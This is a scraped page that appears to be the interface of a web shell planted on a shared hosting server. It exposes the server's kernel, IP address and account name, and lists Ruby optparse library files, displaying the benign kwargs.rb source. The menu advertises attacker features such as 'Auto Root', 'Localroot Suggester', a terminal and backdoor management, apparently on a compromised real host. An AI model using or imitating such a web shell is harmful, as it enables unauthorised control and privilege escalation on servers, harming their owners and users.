Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 18.221.124.95
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ruby /
optparse /
Delete
Unzip
Name
Size
Permission
Date
Action
ac.rb
1.99
KB
-rw-r--r--
2025-03-20 13:38
date.rb
368
B
-rw-r--r--
2025-03-20 13:38
kwargs.rb
716
B
-rw-r--r--
2025-03-20 13:38
shellwords.rb
164
B
-rw-r--r--
2025-03-20 13:38
time.rb
231
B
-rw-r--r--
2025-03-20 13:38
uri.rb
143
B
-rw-r--r--
2025-03-20 13:38
version.rb
2.14
KB
-rw-r--r--
2025-03-20 13:38
Save
Rename
# frozen_string_literal: true require_relative '../optparse' class OptionParser # :call-seq: # define_by_keywords(options, method, **params) # # :include: ../../doc/optparse/creates_option.rdoc # # Defines options which set in to _options_ for keyword parameters # of _method_. # # Parameters for each keywords are given as elements of _params_. # def define_by_keywords(options, method, **params) method.parameters.each do |type, name| case type when :key, :keyreq op, cl = *(type == :key ? %w"[ ]" : ["", ""]) define("--#{name}=#{op}#{name.upcase}#{cl}", *params[name]) do |o| options[name] = o end end end options end end